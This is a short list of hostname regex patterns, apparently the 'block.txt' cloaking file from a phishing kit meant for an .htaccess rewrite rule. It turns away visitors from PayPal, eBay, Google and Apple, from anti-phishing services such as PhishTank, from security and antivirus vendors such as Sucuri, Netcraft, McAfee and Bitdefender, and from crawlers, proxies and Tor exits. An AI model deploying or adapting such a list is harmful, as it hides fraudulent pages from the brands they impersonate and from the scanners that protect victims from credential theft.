# RewriteCond %{HTTP_HOST} ^(?:www\.)?(example\.com)$
# htaccess.txt
# block.txt
^.*google\.com$
^.*paypal\.com$
^.*112\.2o7\.com$
^.*firefox\.com$
^.*apple\.com$
^.*clean-mx\.de$
^.*phishmongers\.com$
^.*phishtank\.com$
^.*\.google\.com$
^.*dnblead\.com$
^.*static\.spro\.net$
^.*sucuri\.net$
^.*rima-tde\.net$
^.*tfbnw\.net$
^.*pacbell\.net$
^.*tpnet\.pl$
^.*ovh\.net$
^.*above.*$
^.*google.*$
^.*softlayer.*$
^.*amazonaws.*$
^.*cyveillance.*$
^.*phishtank.*$
^.*dreamhost.*$
^.*netpilot.*$
^.*calyxinstitute.*$
^.*tor-exit.*$
^.*tor-node.*$
^.*msnbot.*$
^.*p3pwgdsn.*$
^.*netcraft.*$
^.*trendmicro.*$
^.*ebay.*$
^.*paypal.*$
^.*torservers.*$
^.*comodo.*$
^.*crawl.*$
^.*crawler.*$
^.*proxy.*$
# ^.*enom.*$
^.*cloudflare.*$
^.*yahoo.*$
^.*trustwave.*$
^.*centralnic.*$
^.*badware.*$
^.*phishing.*$
^.*antivirus.*$
^.*SiteAdvisor.*$
^.*McAfee.*$
^.*Bitdefender.*$
^.*avirasoft.*$
^.*googleusercontent.*$